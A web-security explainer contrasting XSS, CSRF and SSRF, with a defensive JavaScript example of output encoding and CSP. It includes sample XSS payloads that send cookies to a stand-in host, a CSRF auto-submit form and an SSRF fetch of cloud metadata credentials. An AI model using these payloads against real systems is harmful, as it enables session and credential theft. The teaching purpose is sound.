CSRF, XSS, SSRF
Three web vulns that get lumped together: XSS injects attacker-controlled script into your page, CSRF tricks the user's browser into making requests to your site with their session, SSRF tricks your server into making requests on the attacker's behalf.
Three classic web attacks. Different mechanism, different mitigation. People confuse them constantly.
XSS (Cross-Site Scripting): attacker gets JavaScript to run in another user's browser, on your origin. Once JS runs on your origin, it can read cookies (unless HttpOnly), read localStorage, make any request as the user, exfiltrate data, capture keystrokes. The most dangerous web vuln by impact. Three flavors: reflected (payload arrives in the request, usually a URL param, and is echoed straight into the page), stored (payload saved server-side, e.g. in the DB, and served to other users later), DOM-based (client-side JS copies an attacker-controlled source such as location.hash or document.referrer into a dangerous sink such as innerHTML or eval, without the server ever seeing the payload).
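As an added example (not from the original page), here is the sink side of this in JavaScript: a comment renderer that concatenates user input into markup, the same renderer with context-aware encoding, a URL check for href/src (where HTML escaping alone does not help, because javascript: contains none of the escaped characters), and a Content-Security-Policy value to back it up. The comment fields, hostile payloads, hostnames and helper names are constructed for illustration.

```javascript
// Added example: context-aware output encoding for the XSS sinks described above.
// Node.js, no dependencies. Field names, payloads and hostnames are constructed.

// HTML text and quoted-attribute context: the five characters that can break out.
// Single quotes are included so the same function is safe inside '...' attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// URL context: only absolute http(s) URLs are allowed; anything else
// (javascript:, data:, relative junk, unparseable) becomes an inert "#".
function safeHref(url) {
  try {
    const u = new URL(String(url));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : '#';
  } catch {
    return '#';
  }
}

// The vulnerable shape: user input concatenated straight into markup.
// This is what a stored XSS in a comment feature looks like.
function renderCommentVulnerable(c) {
  return `<div class="comment"><a href="${c.site}">${c.author}</a>: ${c.body}</div>`;
}

// The hardened shape: every interpolation is encoded for the context it lands in.
// The href gets both the URL check and HTML escaping, since it sits in an attribute.
function renderCommentSafe(c) {
  return `<div class="comment"><a href="${escapeHtml(safeHref(c.site))}">` +
         `${escapeHtml(c.author)}</a>: ${escapeHtml(c.body)}</div>`;
}

// A CSP that backs up output encoding: scripts only from our origin or carrying
// this response's nonce (so an injected <script> without it does not run),
// no plugins, no <base> hijacking, no framing.
function cspHeader(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'none'",
    "frame-ancestors 'none'",
  ].join('; ');
}

// Constructed attacker-controlled comment: one payload per context.
const hostile = {
  author: '<img src=x onerror=alert(document.cookie)>',
  site: 'javascript:fetch("https://evil.example/?c="+document.cookie)',
  body: '"><script>new Image().src="https://evil.example/?"+document.cookie</script>',
};

console.log(renderCommentVulnerable(hostile)); // three injection points fire
console.log(renderCommentSafe(hostile));       // inert text, href is "#"
console.log('Content-Security-Policy: ' + cspHeader('r4nd0mN0nce'));
```

The nonce must be freshly random per response and placed on every legitimate script tag; a static nonce is equivalent to 'unsafe-inline'.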
CSRF (Cross-Site Request Forgery): attacker tricks the victim's browser into making a state-changing request to your site, using the victim's existing session cookie. Attacker hosts <form action="https://bank.com/transfer" method="POST"> on evil.com, with the transfer fields pre-filled and a script that submits it on page load. Victim visits evil.com while logged into bank.com. Browser dutifully attaches the bank.com cookie (unless SameSite stops it). Transfer happens. The attacker never sees the response; they only need the request to land.
SSRF (Server-Side Request Forgery): attacker tricks YOUR server into making an HTTP request to a URL the attacker controls or to internal resources the attacker cannot reach directly. "Add image from URL" features, webhooks and HTML-to-PDF generators are classic. Attacker enters http://169.254.169.254/latest/meta-data/iam/security-credentials/ (AWS instance metadata endpoint), server fetches it, returns the response, attacker gets the instance role's temporary cloud credentials. The 2019 Capital One breach was SSRF: a misconfigured WAF was made to fetch the metadata endpoint, and the role credentials it returned were used to pull data from S3.
Defenses, in order of effectiveness.
- XSS: escape output by default, for the context it lands in (React does this for JSX children and attributes), a Content Security Policy that disallows inline script, HttpOnly cookies so script cannot read the session. Never use dangerouslySetInnerHTML (or innerHTML) with user input. Treat uploads as a sink too: serve user files from a separate origin with a correct Content-Type and X-Content-Type-Options: nosniff, or an uploaded HTML/SVG file runs as your origin.
- CSRF: SameSite=Lax cookies (Chrome's default since 2020 for cookies that set no SameSite attribute, with a two-minute exemption for fresh cookies on top-level POSTs; Lax still lets top-level GET navigations carry the cookie), CSRF tokens on every state-changing request, or the double-submit cookie pattern; also check the Origin header. Never let a GET endpoint mutate state.
- SSRF: allow-list destination hosts rather than deny-listing bad ones. Where you must accept arbitrary hosts, resolve the name yourself, reject private and special ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, 127.0.0.0/8, plus IPv6 ::1, fc00::/7, fe80::/10 and IPv4-mapped addresses), and connect to the exact IP you checked; otherwise DNS rebinding passes the check with a public IP and connects to an internal one. Re-run the check on every redirect hop. Use IMDSv2 on AWS and enforce it (HttpTokens=required): it needs a PUT to obtain a session token and that token in a header on every request, which a naive URL fetch cannot supply, and the v1 endpoint keeps answering until you require v2. Route outbound requests through a separate egress proxy with an allow-list.
Order of impact in real breaches: XSS > SSRF > CSRF. XSS gives you the entire session and everything the user can do in it. SSRF gives you the server's network position and, in the cloud, its credentials. CSRF gives you one pre-chosen action per victim, blind.